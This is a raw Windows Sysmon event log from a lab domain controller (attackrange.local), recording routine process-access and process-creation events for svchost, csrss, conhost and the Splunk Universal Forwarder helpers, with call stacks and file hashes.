13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.667{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.542{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.261{59A5CD1D-8EDA-6005-9900-00000000A301}46364888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
